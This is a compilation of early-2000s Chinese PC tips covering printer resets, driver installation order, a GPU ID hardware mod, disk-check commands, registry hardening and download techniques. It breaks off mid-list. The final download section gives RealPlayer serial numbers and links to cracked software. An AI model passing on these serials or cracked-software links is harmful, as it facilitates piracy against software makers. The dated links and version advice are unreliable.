    赶紧上网请教高手吧，论坛上支招的高人真不少，总结起来有四招：一是检查当前用户有没有管理员权限(但我的电脑只有Administrator一个用户)；二是下载最新的Windows Installer 2.0版；三是结束进程IKERNEL.EXE后再安装；四是删除系统安装目录Program Files＼Common Files＼InstallShield＼Engine下的所有文件再安装。

    我按照高手们所说的一一操作，但依旧无法进行安装！重试过很多次后，“拒绝访问”四个字提醒了我：难道是C盘访问权限的原因？我的硬盘是NTFS格式的，前一段时间RPC漏洞弄得人心惶惶，我打上了补丁后还不放心，删除了Everyone组，另添加了Administrator对硬盘的完全控制权。难道是这个原因？我试着在“C盘→属性→安全”选项卡下添加Everyone组后，启动Windows Installer服务，居然成功了！

    重试几次后发现，其实只需要给Everyone组赋予“读取及运行”、“列出文件夹目录”、“读取”三项权限其中之一，就可以解决Windows Installer无法启动的问题。如果顾及隐私和安全问题的话，只赋予Everyone组“列出文件夹目录”权限即可。使用Windows 2000/XP和NTFS分区的朋友们，如果你的Windows Installer也出了问题，可别忘了我的这番经历哦！


喷打计数器清零

《一键清理系统垃圾》

喷打计数器清零

    我公司使用了许多EPSON公司生产的喷墨打印机。但是，A3幅面的喷墨打印机却相对较少，有EPSON STYLUS COLOR 1500K和EPSON　STYLUS COLOR 1520K这两种。近年来，使用一切正常。最近我用1520K开机打印文稿时，打印机突然发出一阵“恐怖”的声音，随后打印机右边面板上的所有红灯全部发亮，打印头无吸墨动作，机器不能打印任何文字与图像，整台打印机陷于瘫痪。
    起初估计是墨盒中的墨水用尽，但转念一想，两个墨盒（彩色的与黑白的）虽使用了一段时间，但根据以往的经验，理应还可以再使用一段时间。因为墨盒中的墨水如果用尽，只会有一个或两个灯闪烁，不会全部灯都亮且闪烁。查看使用说明书，指示灯全亮且闪烁是发生未知错误，须关机几秒钟后再开机，如果错误仍存在，最好与供应商或授权维修中心联系。按操作手册做，反复开机关机均是如此。而我急着打印文稿，找供应商，不能解燃眉之急，还得自己想办法。
    俗话说：病急乱投医。按一般常识，估计是软件或病毒原因，于是乎，又是装软件，又是用瑞星、AV95、KV300检查杀毒，一段时间忙乎后，问题照样没解决。还会有什么原因呢？一时想不出来，马上上EPSSON网站查资料，一无所获；接着，打电话给附近的EPSON特约维修中心、授权维修中心、EPSON驻中国办事处等处咨询。得到了一丁点有用的信息，大概是：EPSON打印机内部设有一个计数器，记录墨头吸墨次数。等计数器计到一定数值后，就要清洗吸墨海绵及装废墨盒，然后将计数器清零即可。具体如何操作，他们也不知道。经过反复实验，终于找到了将计数器清零的方法：按住“ALT”键、“换行/换页”键、“进纸/退纸”键、“字体”键四键，开机，听到“嘟”一声响后，机器恢复正常工作。


喷打加墨后的常见故障处理

《一键清理系统垃圾》

喷打加墨后的常见故障处理

    1.EPSON喷打墨盒加墨水后出现断线的处理
    EPSON打印机在使用中因为加墨水不当或是较长时间不用而出现断线的情况较常见，多数人都误以为是堵头了。这时处理不好会真的导致堵头，或是急着送去维修，白花冤枉钱。其实处理的办法很简单，首先要区分什么是断线，什么是堵头。做喷嘴检查时线条不连续（有断线），这时一般都应做打印头清洗。清洗几次后观察，如果断线始终都是在相同的部位而无变化，一般是堵头了，堵的喷嘴就是断线处的喷嘴；如果在几次清洗后，断线的位置不固定，则可判断不是堵头，而是孔道中有空气，墨水供应不连续，造成断线。
    解决的办法是：首先判断，在每次清洗后，断线的根数是否越来越多。如是，第一结论是该种颜色的墨水用完了，取下墨盒证实后加墨水即可解决问题。如果是刚刚加完墨水就出现断线，结论应是加得过急，出墨口内存有空气，随墨水进入孔道，打印时出现断线。这时取下墨盒，弹一弹或磕一磕，将出墨口向下静置十分钟后放回打印机，做喷嘴清洗。需要注意的是，每次喷嘴清洗之间的间隔要略长一些（半小时左右），让墨水有一个自然沉降的过程，连续做喷嘴清洗效果并不好。
    2.EPSON喷打墨盒加墨水后出现堵头的处理
    前面讲过如何判断堵头和断线。多数人会把断线误认为是堵头，事实上如果不是几个月不用，或把墨盒取下较长时间，一般不会发生堵头，喷嘴口处的墨水干结一般不会把喷嘴堵死。常见的是，因为某种原因产生断线，用户又不知如何正确处理，孔道中存有空气是最容易发生堵头的。堵头后连续做喷嘴清洗是无济于事的，空浪费墨水。实践中证明的简单而又有效的办法是：将打印头移至更换墨盒的位置（通常是按住走纸键一秒钟），用蒸馏水或清水滴在喷头正常停放处的海绵上将其浸透，让打印头复位，关机。第二天再开机，清洗打印头，做喷嘴检查。堵头不是十分严重的，一般都能解决问题。若仍不能解决问题，只好送维修中心或自己清洗。
    3.CANON、HP、LEXMARK等带喷头的墨盒加墨水后出现断线或堵头的处理
    CANON、HP、LEXMARK等带喷头的墨盒的共同特点是，在墨盒的上部或侧面有通气孔（兼注墨孔），该孔在生产时用来加注墨水，使用时用来保持墨盒内外气压平衡。造成断线或堵头的原因有几种，通常是用完的空墨盒放置较长时间才灌墨水，喷嘴在无墨的状态下很容易干结堵塞；另外加墨水时处理不当，如内外压力调整不当，也能导致断线现象。
    处理的方法是：找块干净玻璃（或其它平面物体）滴少许清水，将墨盒喷头浸在水中二至十小时（视堵的程度而定，注意不要打湿触点），再用面巾纸沾拭喷嘴，能通畅渗出墨水即可。若仅有轻微渗出，可从通气孔向墨盒里吹气或打气，看到墨水从喷嘴流出较通畅即可。只要喷嘴或喷头线路未损坏，此法能解决大部分墨盒的问题。
    4.补充墨水后立即打印，断线或打印不出来该如何处理
    补充墨水时，若用力挤压墨水瓶会造成一些气泡跑进墨盒里，若气泡堵在喷嘴处会造成断线，此时需等待数分钟，气泡消失后即可打印。绝大多数的墨盒内装有海绵体，内部若有残留空气，墨水将无法顺利到达喷嘴，此时将墨盒取下并对准填充孔吹气数下，使真空部分充满墨水即可打印；若是分离式的墨盒则执行打印机的打印头清洗动作即可打印。但头一两张可能会有断线或少一两种颜色，此乃正常现象，待墨水完全充满喷嘴时即可正常打印。
    5.屏幕上的颜色与打印出来的颜色不一致的处理
    屏幕偏色现象的原因很多，有扫描仪输入过程中的设置因素，也有图像处理软件本身设置的因素，还有显示器驱动程序的设置因素，通过以上设置的调整均可改变显示图像的偏色。打印输出的偏色现象在使用原厂墨盒时也常出现，与使用墨盒（墨水）的厂家不同、使用的纸张类型不同或纸张的厂家不同都有关系，目前绝大多数彩色喷墨打印机的驱动程序均具有颜色调整设置，可随时视偏色程度进行调整。若某种颜色严重缺色时，可能是该种颜色的墨水将用尽，及时补充墨水即可解决。


奇怪的花屏现象

《一键清理系统垃圾》

奇怪的花屏现象

   好久没玩3D游戏了，于是决定拿极品飞车Ⅴ来练练手。可是我刚进入游戏，居然花屏了，硬盘也停止了响应。

       先介绍一下我可怜的PC：K6Ⅱ300 CPU，ASUS P5A主板，Trident9750+Voodoo显卡，200W ATX电源，Win 98+Win 2000操作系统。

       我先重新启动机器进入到Win 2000系统，打开《人猿泰山》这个游戏，可是进入了游戏主界面后，选择“Start Game”按下回车键之后屏幕一闪，又花屏了。系统也差点“死”了。看来不能怪Win 98了。那问题出在哪里呢？根据以往的经验，造成花屏现象主要有以下几种原因：

       1. 显示芯片散热不良；

       2. 金手指接触不良；

       3. 电源负载不够，滤波不良；

       4. 显卡与其他软硬件冲突；

       5. 软件运行时的分辨率问题；

       最糟糕的可能性是——显存坏了。

       于是我步步为营，先从硬件开始检查。打开机箱，Trident9750和Voodoo上的风扇工作正常，温度适宜，由此排除第一种可能。然后检查金手指和电源均没有发现问题。由于我的机器一直使用良好，又排除了兼容性问题。

       会不会是久违的Virus兄在搞鬼？我用Norton 2001杀了一通，未见异常。难道是分辨率问题？我已经试过多个游戏和软件了，情况都是大同小异。

       正在做最坏打算的时候我忽然想起Win 2000和Win 98这两个系统虽然几乎是独立的。但是它们共同使用Autoexec.bat这个自动批处理文件。

       于是我用记事本将其打开，发现一大串有“setXXX=XXX，Ram=XX”等等的字眼，原来我最近使用了一个软件将显卡“优化 ”了一下（美其名曰：超频），结果Voodoo受不了，于是就跟我翻脸了。

       解决的方法那就简单了，把这些语句删掉就OK了，还是老实点吧。

       保时捷又回到了跑道上，金属漆下的车身在阳光下熠熠闪光。

       编后：超频还是悠着点，别自我麻烦。


清洁电脑的几个误区

《一键清理系统垃圾》

清洁电脑的几个误区

    现在，电脑已经作为一种普通的家用电器进入了家庭，电脑使用久了，也必须要做清洁和保养，但对于如何做清洁和保养电脑，却有以下一些误区。
    误区一：用无水酒精清洗电脑显示器。一般来说，酒精是一种常用的有机溶剂，可以溶解一些不容易擦去的污垢，如果只是用来清洗显示器外壳，也没什么不良的影响。但一定不要用酒精来清洗显示器屏幕，因为现在一些较高档的显示器都在屏幕上涂有特殊的涂层，使显示器具有更好的显示效果，一旦使用酒精擦拭显示器屏幕，就会溶解这层特殊的涂层，对显示效果造成不好的影响。
    误区二：用无水酒精清洗光驱的激光头。有很多电脑书刊都告诉大家可以用无水酒精清洗激光头，这样做有时会对激光头造成很大的伤害。不同的激光头，所用的材料也不同，对于一部分光驱，其激光头物镜部分使用了一种类似于有机玻璃的物质，如果使用酒精擦拭它，酒精会溶解它的表面，使其变得不透明而彻底损坏光驱激光头。还有一部分光驱，光头物镜表面有一层用真空沉积涂层法涂上去的薄膜，用以调节折射系数，使激光按特定波长无损失地通过，所以光头显蓝色。但这层薄膜会溶解于酒精，用酒精擦拭这种激光头，会在擦去灰尘的同时溶解这层薄膜，尽管短期内光驱读盘能力会有所提高，但激光头已经受损。比较好的清洗激光头的方法是直接用干净的脱脂棉擦去激光头的灰尘，或蘸取少量丙酮擦拭激光头。同样也不要用酒精清洗电脑光盘，它也会溶解光盘表面的涂层。
    误区三：用VCD清洗光盘来清洗光驱。现在市场上有很多VCD清洗光盘出售，有的朋友就用它来定期清洁光驱，这种光盘上有两排小刷子，如果是在一般的VCD机上使用，由于VCD机使用的是二倍速光驱，光盘的旋转速度并不快，所以当小刷子在VCD机光头上轻轻扫过时，可以起到清洗光头的作用。但现在的电脑所用的光驱速度就快得多了，常用的都是30倍速以上的光驱，光盘的旋转速度已经接近以前一些老式硬盘的速度，当用这种VCD清洗光盘清洗光驱时，这两排小刷子就成了光头的杀手，不仅会划伤光头，严重时还会撞歪光头，使其定位不准，无法从光盘读取数据。
    误区四：定期用软驱清洗盘清洗软驱磁头。这种用绵纸做盘片的软驱清洗盘还很常见，使用时放进软驱里，执行DIR命令就可以了。不过老实说，一开始我就怀疑这种清洁盘的实际作用，绵纸做盘片很容易将绵纸上的纤维缠在磁头上，如果再滴上那种随盘一起出售的清洁液，磁头甚至有可能划破这层淋湿后的盘片，带来更大的麻烦。其实现在软驱使用频率并不高，完全不必经常清洁，如果一定要清洗磁头，可以用放入一张质量好的新软盘，把它反复格式化几次，一般磁头就可以清洗干净了。假如磁头污染较严重，可以打开软驱，用干净的脱脂棉蘸取清洁录音机磁头的清洁液小心擦拭。


驱动程序安装顺序

《一键清理系统垃圾》

驱动程序安装顺序

对于初级DIY玩家来说，应用技巧最为重要。今天就来谈一谈计算机驱动安装的程序问题。虽然这是一个很简单的操作，但往往因为驱动的安装顺序不同，会造成系统程序不稳定，经常出现错误错误现象而必须重新启动计算机。

驱动安装顺序：

（1）给主板加电，进入BIOS进行初始设置，（建议 LOAD DEFAULT 值）。
（2）首先安装*作系统。如果是WIN2000&WINXP系统，刚在*作系统安装完后安装最新的补丁。
（3）将主板所附带的驱动程序CD放入光驱中，系统自动弹出驱动程序安装窗口，请按顺序安装主板的驱动程序。（如：INTEL的INF驱动和IAA应用程序加速器或者VIA的4 in 1 Drivers）
（4）安装最新的 DirectX。（一般情况下都是越新越好，目前最新版本为8.1）
（5）安装最新的显卡驱动程序。（如：nVidia的Detonator XP Drivers或者ATI的CATALYST RADEON Reference Drivers）
（6）安装声卡的驱动程序。
（7）如果主板带有RAID芯片，则安装RAID芯片的驱动程序。（注意：如果安装的*作系统为WIN2000&WINXP，这个步骤必须提前到安装*作系统时进行，按"F6"键来进行安装驱动。否则系统会因为找不 RAID 芯片上的硬盘而终断安装程序。）
（8）安装其它设备的驱动程序（网卡，MODEM，如果声卡和MODEM有冲突的话，应该把声卡的驱动删除后再安装MODEM的驱动程序）。
（9）安装应用软件。
（10）确定系统已经稳定运行后再次进入BIOS设定具体参数，以使其能够更好地，更稳定地工作。

附：

ATI显卡驱动安装技巧和心得，给使用ATI的朋友。

    暑假好game尽出...也很多人升级硬件,ATi,Omega最近也频频更新driver...
这边提供一些简单的方法跟心得. 希望会帮助到一些玩家　不啰唆,
以下以原厂Radeon8500在WinXP 配Omega/Plutonium XK1.1.07
& ATi官方正式Catalyst 0.21 6094 4272C Multi-Language Version测试
已经装过旧driver的...先下载下面上传的Tools.zip,里面有一些小工具
其中有一个AtiUnins.exe ,是ATi driver uninstaller,可以利用他完全砍光旧的driver,folder,registry.简单说就是回复到刚把卡插上mb开机的干净状态!非常好用.然后就是安装driver,如果是Omega的话,一开始他会问你要不要更新扫瞄频率,并警告会连带影响TV-out.这里选择default,不然会有连计算机屏幕都变成交错扫瞄的现象如果是装官方英文版4273C,只要下一步,下一步....不会有任何问题.但是4272c的多国语言版会造成ATi控制台路径错误,变成在高级里一乾二净没得调整的状况(Omega XK1.1.07 based on 6107beta多国语言版.所以也会有此bug)解决方法就是先只装display driver,再到安装时的folder去找CPanel→Setup.exe安装ATi控制台一定要分别安装才可以自订路径,此时指到WINDOWS\system (不是system32！),重开机.大功告成。

ATI TOOLS下载地址：

http://www.seethru.com.cn/download/tools/xianka/tools.zip

显卡：MSI MX440-SE
原因：SOFTQUADRO4改卡成功了，性能不错，可是后来发现不能HIBERNATE休眠！以为是BUG，后来RIVATUNER开发者说就是这样的！靠！逼得我非硬改不可！
目的：将MX440改造为 QUADRO 550XGL
原理：先来看GF4系列ID对照表：（可以在驱动源文件nv4_disp.inf中查出来）
MX460的ID为0170
MX440的ID为0171
...
550XGL的ID为0178
MX440和550XGL最关键的区别就是最后一位1和8地区别，换成二进制就是0001和1000，稍微有点电路经验的人就会联想到1、0分别代表高、低电位，实际上nvidia系列显卡就是这样做的，它通过检测ROM芯片的其中4个引脚的高低电位来判别ID号！
实施：好，原理知道了，开始动手。先找出0001的1是板上哪个电阻？1表示电阻接高电位，再想想以前GF2改造中提过的检测ID是ROM的18,19脚，可能还没变。先看看这两个引脚的电阻怎么接的，用万用表一量18脚接高，19脚接地，看来18脚就是我们要找的引脚！马上动手，将18脚置高电位的电阻R727拆下，换到接地的R726。 这样一来，显卡ID应该是0170，对应的显卡型号应该是MX460，装上电脑试试，进入系统后果然说检测到MX460！哈，第一步走对了！现在要做的是把0000改成1000了。这个1是那个电阻呢？刚刚18脚接的电阻是R726/727，对应最后一位的0/1；19脚接的电阻是R728/729，对应最后面的倒数第二位的0/1；这样算过去R730/731对应的是第三位的0/1，那第四个0/1应该对应的是R732/733! 如果真的如此，那R732应该有个10k电阻，而R733空着，实际查看后，确实如此！好，马上把电阻从R732换到R733，装上电脑，进入系统，检测到新硬件......QUADRO 550XGL!
总结：MSI MX440 改成 QUADRO 550XGL只需要移动两个电阻：R727-> R726, R732->R733.
【提示】
1. 建议找使用公板PCB设计的显卡来改，如MSI


取消磁盘扫描

《一键清理系统垃圾》

取消磁盘扫描

    问：我的电脑安装的是Windows XP，最近只要正常关机，再开机就会自动运行磁盘扫描。若是重新启动则不会有这种情况，以前用Windows 98操作系统时也遇到过这种情况，不知该如何解决？

    答：这是因为Windows XP认为你没有正常关机，所以强制性扫描。你可以在命令行提示符里面输入chkntfs /x X:取消对X盘的检查。另外建议你到Windows Update(http://windowsupdate.microsoft.com)上检查你的系统并安装相应的补丁程序。


取消磁盘扫描前的等待时间

《一键清理系统垃圾》

取消磁盘扫描前的等待时间

    使用Windows XP遇到停电、死机等意外情况，重新启动计算机后会自动进行磁盘扫描操作。在进行磁盘扫描操作之前，系统会给出一个10秒的倒计时时间让选择是否跳过磁盘扫描步骤。可以通过如下的操作来取消磁盘扫描前的倒计时等待时间。

    依次单击“开始→所有程序→附件→命令提示符”，进入命令提示符窗口，然后在命令提示符下键入CHKNTFS /T:0命令，回车后即可将自动磁盘扫描前的初始递减计数时间改成0秒，以后Windows　XP在进行自动磁盘扫描时就不会进行倒计时等待了。


如何彻底删除输入法文件

《一键清理系统垃圾》

如何彻底删除输入法文件

    先到输入法设置中删除你要删除的输入法，使用搜索功能，搜索到输入法的对应文件删除！
    全拼：Winpy.ime、Winpy.mb、Winpy.hlp、Winpy.cnt。
    双拼：Winsp.ime、Winsp.mb、Winsp.hlp、Winsp.cnt。
    微拼：Pintllime.dll、Pintlgab.imd、Pintlgai.imd、Pintlgb.imd、Pintlgd.imd、 Pintlgdx.imd、Pintlgie.imd、Pintlgnt.cnt、Pintlgnt.hlp、Pintlgnt.i96、 Pintlgnt.ime、Pintlgrb.imd、Pintlgri.imd、Pintlgs.imd、Pintlgsi.imd、Pintlgsx.imd、Pintlgu.imd、Pintlguc..imd、Pintlphr.exe。
    智能ABC：Winabc.cwd、Abcsda.dll、Abcwin.exe、Winabc.ime、Winabc.ovl、tmmr.rem、user.rem、Winabc.hlp、Winabc.cnt。
    郑码：Winzm.ime、Winzm.mb、Winzm.hlp、Winzm.cnt。
    内码输入法：Wingb.mb、Wingb.hlp、Wingb.cnt。
    表形码：Winbx.mb，Winbx.ime，Winbx.hlp，Winbx.cnt。


如何防止恶意网页篡改注册表

《一键清理系统垃圾》

如何防止恶意网页篡改注册表

    1.升级IE为6.0版本并利用Windows Update下载微软补丁Microsoft Windows Script 5.6；

    2.在“Internet选项”→“安全”→“自定义级别”中将ActiveX插件和控件、Java脚本等全部禁止，不过这样做在以后的网页浏览过程中可能会造成一些正常使用ActiveX的网站无法浏览；

    3.通过修改注册表来禁止恶意网页使用注册表编辑器Regedit，具体做法是：打开注册表到HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System，在Policies下面新建一个主键，取名System，然后在右边空白处新建一个DWORD串值，名字取为DisableRegistryTools，把它的值修改为1，这样可有效防止恶意网页篡改注册表；

    4.对于Windows98用户，可把C:\WINDOWS\JAVA\Packages\CVLV1NBB.ZIP中的“ActiveXComponent.class”删掉；

    5.对于WindowsMe用户，可把C:\WINDOWS\JAVA\Packages\5NZVFPF1.ZIP中的“ActiveXComponent.class”删掉；

    6.对Windows2000用户，可把Windows2000服务里面的远程注册表操作服务“Remote Registry Service”禁用，以防止恶意网页篡改注册表。具体方法为：“管理工具”→“服务”→“Remote Registry Service”(允许远程注册表操作)”，将这一项禁用；

    7.利用第三方软件(比如超级兔子IE保护器、优化大师等)设置来防止；

    8.开启杀毒软件(瑞星、KV杀毒王等)的实时“网页监控”功能。


如何关闭Dr.Watson

《一键清理系统垃圾》

如何关闭Dr.Watson

    Dr.Watson是Win 2000的一个崩溃分析工具，它会在应用程序崩溃的时候自动弹出，并且在默认情况下，它会将与出错有关的内存存为DUMP文件以供程序员分析。

    不过我们作为普通用户，记录DUMP文件不但毫无用处，而且还有两个极大的缺点：

    1.崩溃的瞬间，会有一个对话框弹出，告知应用程序出错将被关闭。这时，一般伴随有巨型的读盘现象，要过很久程序才能关闭。这是因为Dr.Watson在做内存DUMP。

    2.占用大量磁盘空间。有时DUMP下来的这些文件会占用大量的磁盘空间。

    实际上DRWTSN32是WIN2000默认的出错调试器，如果我们根本不想用它的话，打开注册表编辑器，进入主键［HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\AeDebug］，然后将“AUTO”键值设置为0。


如何看电影、下载电影以及一些必备工具和常识

《一键清理系统垃圾》

如何看电影、下载电影以及一些必备工具和常识

       1.开场白
从网上下载，听起来容易，但想真正成为高手，就要做到“下别人之不能下，载别人所不会载，”其中的门道可并不简单。
提到下载，很多人都认为所谓的Download不过是从网上把软件或MP3复制到硬盘中的一个过程。然而，如果真用这个标准来衡量的话，恐怕把全世界网民至少能数出几亿个下载高手来。可实际上，下载包含的内容远不止于此。从理论上讲，即使是浏览普通的网页也应该算是下载的一种，何况去下载软件、音乐、图书等更精彩的资源了。网络的开放性不断吸引着人们去寻找对自身有价值的东西，而各种商业网站又为了自身的利益，不断依靠“先进”技术使它们提供的资源逐渐封闭化。为了下载一个软件而打开三层页面的网站并不少见，而更多的图库站点更需要您不断点击大大小小的链接才肯露出庐山真面目；说是免费阅读图书，又不让您下载，给您一个连抓图都不支持的Java窗口，慢慢看去吧！（估计等您把书看完，您的网费开销能买十本原版书了。）有人说，网上的免费是糖衣炮弹：想下载软件，请您看广告；想聊天，请您看广告；想要免费信箱，请您看广告（更有附加在您每封邮件末尾的广告）。还有，某些精彩的Flash动画、Real影片以及各种在线播放的音频和视频，更是“只可远观而不可亵玩焉”——不支持下载！
难道就没有把糖衣吃掉再抛弃炸弹的方法吗？当然有！正所谓魔高一尺，道高一丈。对付特别的站点就要使用特别的方法，才能获取某些平时无法取得或者十分难以取得的资源。您想下载嵌在网页里的Flash动画吗？您想下载只提供在线播放的Real格式电影吗？您想下载收费的电子图书吗？您想学习更强大的超批量下载技巧吗？那就千万不要错过下面的文字，这就是——极限下载秘技！
2.获取真实的下载地址
工欲善其事，必先利其器，我们当然不必去研究如何更加科学地使用IE的下载窗口，因此您至少需要下面两个流行的下载软件之一：网际快车FlashGet（推荐使用）或网络蚂蚁NetAnts。
作为一个网民，笔者有时不得不向朋友提供某个软件的下载地址，然而这就出现了一个关于真实下载地址的问题。 首先，对同一个软件，我这儿有两个下载地址：
http://download.sina.com.cn/scgi ... ts=/fm311ch0108.exe
http://www.bodafox.com/download/fm311ch0108.exe。
如果是您的话，您更愿意接受哪个呢？很显然，后者是一个典型的URL，它相对于第一个地址来说更加明显，也不容易写错。而实际上这两个地址所指向的是同一个文件，它们在实质上毫无差别。那么如何才能获得真实的下载地址呢？
FlashGet的“重新定位到”，网络蚂蚁的“重新定向”。
当您采用软件来下载时，一般都会在下载任务栏下面出现一个进度指示区。以FlashGet为例，所谓的“图表/日志”就表示着指定任务的下载进程。细心的朋友可能会发现，各种下载软件在把任务进行分段下载时，其中的每一段都会有详细的进度说明。在下载任务添加完毕后，点击“图表/日志”下方的“Jet 1”，您会看到下载信息中经常会出现这样一行文字：“重新定位到……”。实际上，这个重新定位的目的地就是该任务的真实下载地址。无论您原始的下载地址是像上面例子那么长的一大串字母和符号，还是一个ASP地址或者别的什么，只要您认准“重新定向”的位置，保证真实的下载地址原形毕露！另外，网络蚂蚁也具备相关的功能，其重新定向的位置以“Location”表示。
也许您会问：“知道了真实的下载地址，又有什么用？”没关系，这只是一个预备知识，您现在只要掌握这个技巧就好，一会儿会用到的。
3.疯狂下载连锅端
必须承认，这个部分的内容是关于一种极度疯狂的下载行为的，然而它又比用WebZip这样的软件去下载站点理智一些。毕竟像WebZip那种通过下载页面的层数来控制下载的信息量，这种行为无论怎么看也是非常值得怀疑的——天知道您的站点有多少个层次！那么，如果您只是为了得到几个软件，就在WebZip的地址栏上输入下载站点；这也未免太小题大做了，况且为了让我刚才说的“获得真实下载地址”的技巧看起来比较有用，就把这个疯子般的下载术放在脑后吧。下面让我来告诉您，如何最快速地得到更多有用的东西……
以国内着名的下载站点“中国下“（http://www.download.com.cn/）为例。我们首先通过上述的方法，使用下载软件查出了某个软件的真实下载地址（过程我就不重复了，例如联结ftp://ftp.download.com.cn/pub/new_tools/sunglass.zip）。然后只要稍作处理就可以让它变得有用：这个地址去掉了末尾的文件名之后（例如ftp://ftp.download.com.cn/pub/new_tools/），所表示的含义就是该软件的目录。下面，您可以打开IE浏览器，输入这个目录地址，就会立刻看到与我们要下载的软件处于同一个目录下的其他所有软件。
所有的软件都出现在这个窗口中。
如果您是一个新软件的试用者，那您可有福了。直接把想要的软件拖拽到Windows的窗口中，下载过程自动完成，连下载工具都省了。然而，您更可以通过FTP站点的目录结构游走整个中国下载站点，把所有软件尽收眼底，尽情下载吧。
对于其他FTP站点的地址，此方法依然适用。因为大部分FTP站点都是支持匿名登陆的，但匿名用户的权限一般都是“只读”，也就是说您可以任意下载FTP站点中的任何软件，却不能上传或删除任何东西。不过对于下载狂人来说，这足够了。怎么样？这种疯狂的“连锅端”下载技巧令您感受到下载的快感了吗？
4.吝啬鬼下载术
相对于疯狂的端站点技巧，还有一种细致得锱铢必较的令宽带上网或公款上网用户不屑一顾却让饱受拨号上网龟速之苦的群众欢欣鼓舞而津津乐道的——吝啬鬼下载术。
如果经常下载软件的话，您会发现从网上下载到的软件大多是zip格式的。这样做一来为了节省宝贵的服务器空间，二来可以减少下载软件的信息传输量；然而之所以用zip格式进行压缩却很少用到rar和ace这些压缩格式，则主要是因为zip的普及程度高。可是您发现没有，当您把辛辛苦苦下载回来的zip包打开的时候，是否会发现有很多与应用程序无关的文件呢？比如站长们为自己打的小广告啦，根本看不懂的英文Readme啦……如果能把没用的家伙们统统排斥在外，您是否会感到一点点轻松呢？还有这种情况：朋友把许多文件都压缩成一个体积巨大的zip并传到网上，而您现在只需要其中的一个小文件，怎么办呢？
Zip预览的功能在Download Mage的左下角。
有Download Mage就没问题了。这个简明的下载程序虽不如FlashGet那样知名，但它的最大特点就是能事先预览要下载的zip压缩包中的文件，然后您可以选择哪个文件下载，哪个文件不下载，把不受欢迎的文件排除掉，下载不就更轻松了吗？Download Mage也能像FlashGet那样直接截获IE中的URL并展开下载，但需要您先在它的Setup标签中启用IE支持插件（Install IE Support），当然Netscape也是可以被支持的。
Zip压缩包中的文件清晰可见。
接下来，只要您从浏览器中点击任意的软件下载链接，Download Mage就会自动弹出并准备开始下载。此时点击左下角的Zip预览（Zip Preview）按钮，您就可以清楚地看到该Zip压缩包中有多少个文件，各自的大小是多少。按住Ctrl键复选您想要下载的文件，再确保“Download Selected Files（下载选定的文件）”被勾中后，按回车键即可开始这吝啬鬼般的下载术了！
那么，到这里为止，最疯狂和最保守的下载方法都有介绍了，下面就来点更高深的技巧吧！
5.超批量下载
所谓的“批量下载”实际上是下载工具的一项普通功能。下载程序通过分析页面上的各种链接，把所有可能下载的文件都罗列出来。这时您只需简单地选择需要下载的文件，或者通过文件类型进行批量选择某种文件，之后下载的任务就完全交给程序了。看，就是如此简单的一个功能，却能省去我们大量不必要的重复劳动。但是目前实际的应用情况却是：网站为了增加浏览量，竟然给每张图片都制作一个html页面，或者再来个专门的鉴赏页什么的，结果反倒大大增加了用户的负担。要知道很多人都希望能尽快收集到更多的优质图片，但是如此的收集方法是不是太麻烦了呢？
我们不妨先来看一个例子：http://www.51m.com/pic/2/best124.htm，这是一个典型的图库下载页面。按照每个缩略图所指向的链接，不难发现我们只有逐个打开每张图片所在的页面，才能看到并且保存相应的图片。如果您还是觉得不直观的话，那么我就在这里使用“批量下载”，看看会出现什么效果。
批量下载。
在页面上点鼠标右键，选择“使用网际快车下载全部链接”，于是出现所有由FlashGet探索到的可供下载的文件。仔细观察一下就不难看出，其中没有任何图形文件！也就是说普通的批量下载在这里完全不起作用。
批量下载不行，怎么办？
显然，您需要一种更好的批量下载的方法，来帮助您提高下载的效率。下面就要看FlashGet的绝技了。0.94版本以后的FlashGet增加了一项非常诱人的功能：站点资源探索器。它能够沿着您提交的URL尽可能找到所有可以下载的文件，启动站点资源探索器的快捷键是F7。
下面，在网站资源探索器的地址栏中键入刚才那个网址并按回车……您看到什么了？是不是出现了一些jpg图片？如果您觉得这些图片排列得不够明显，就点击一下“类别”栏目，这下明显了吧？选中这些图片，点击工具栏上的“下载”，那么您就连URL都不用担心了，FlashGet会自动为您下载这些图片！
资源一旦被探索到，就可以被FlashGet下载。
这就是强大的“超批量下载”，您觉得这个技巧好用吗？相信在实际的应用过程中，您一定能逐渐体会到它的优越性
如何看电影和一些必备工具
1.电影.asf .mpeg结尾的文件用media player观看。
2.ram,rm结尾的用realplayer观看。
realplayer加强版,注册码: 1116-11-0060，
http://66.54.221.196/tool/real.exe
3.有的mpeg和ask的文件是DIVX编码的需要DIVX插件,安装插件后才能用media player观看。这里斑竹推荐一个专用看DIVX的player,占用系统资源更少：
http://66.54.221.196/tool/player.exe
4.文件结尾r01和r02，exe这种是一个大文件用winrar分割成为若干小块，需要用winrar合并后才能观看，winrar下载：
http://66.54.221.196/tool/wrar271.exe
通常rar的文件要winrar这个软件来解压缩。有些文件用winrar分割，但是应该有一个头文件，后缀应该是exe，不过要全部下载完才能打开。小技巧：解压缩时候会生成临时文件，它的大小是0，可是能用播放器放。不过保存有点问题了。
5.文件结尾001、002、003，这种是用hjsplit分割的文件，需要用hjsplit合并后观看：
http://66.54.221.196/tool/hjsplit.zip
hjsplit2.2是一个小巧好用的文件分割工具，能分割任何类型文件和任何大小，也能将下载回来的分割文件合并！
6.mms://，这种是media player的在线播放协议，可以直接在线观看，下载要用Streambox VCR，其用法和flashget蚂蚁等差不多：
ftp://ftp2.fm365.com/game/zone/newren/gongju/vcr.zip。
将压缩包解压后即可运行StreamBox vcr汉化版，软件已破解，无需安装、无需注册码（随意输入）。
7.rstp://，这种是realplayer的在线播放协议，可以直接在线观看，下载要用Streambox VCR，其用法和flashget蚂蚁等差不多。
8.vod结尾的文件用VODLive Player观看，VODLive Player下载：
http://download.pchome.net/php/d ... player302.exe&svr=7
下载电影播放电影软件大全
[播放工具：
RealPlayer9.0[播放rm等文件]序列号：0444-90-4466：
http://ark.hit.edu.cn/Soft/Multimedia/Realone_gold.zip
http://www.xz.jsinfo.net/Music/download/rp8.zip
Media Player7.1[播放asf、wmv等文件]：
http://sq.onlinedown.net/down/mp71cn.exe
http://www.xz.jsinfo.net/Music/download/wmp7.exe
http://www.xz.jsinfo.net/download/wmp8_rc1.zip
DIVX插件[看MPEG4的工具]：
http://person.longcity.net/home2/aodu/temp/divx_311alpha.exe
http://www.xz.jsinfo.net/download/mpeg4.zip
下载工具：
Streambox VCR[下载在线电影，如rtsp pnm]：
http://www.32505.com/soft/StreamboxVcrSuite.rar
网络蚂蚁1.25：
